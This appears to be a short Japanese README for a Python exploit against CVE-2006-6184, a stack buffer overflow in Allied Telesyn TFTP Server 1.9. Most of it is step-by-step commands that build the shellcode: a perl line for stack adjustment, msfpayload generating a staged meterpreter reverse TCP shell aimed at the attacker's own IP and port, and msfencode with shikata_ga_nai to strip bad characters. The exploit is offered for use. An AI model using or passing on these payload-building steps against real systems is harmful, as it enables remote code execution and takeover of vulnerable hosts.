
https://github.com/shauntdergrigorian/cve-2006-6184 の簡易版
これは、CVE-2006-6184 向けの Python ベースのスタンドアロンエクスプロイトです。このエクスプロイトは、Allied Telesyn TFTP Server (AT-TFTP) 1.9 およびそれ以前の可能性があるバージョンにおいて、スタックベースのバッファオーバーフローを引き起こし、リモートの攻撃者がサービス拒否を引き起こしたり、任意のコードを実行したりすることを可能にします。
そんなに簡単だとは思っていなかったでしょう? ペイロードは、自分の IP アドレスとリッスンポートを含むようにカスタマイズする必要があるため、自分で生成する必要があります。 そのためには、次の手順を使用してください:
1.) スタックポインタから減算する必要がある量(3500)の hex ファイルを作成するには、以下を入力します:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) 次に、以下のコマンドを使用して、ステージ型 meterpreter シェルペイロードを作成します:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) 次に、作成した2つのファイルを結合します:
cat stackadj payload > shellcode
4.) 最後に、悪い文字を除去しましょう:
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
出力を「payload」変数の値として入力してください。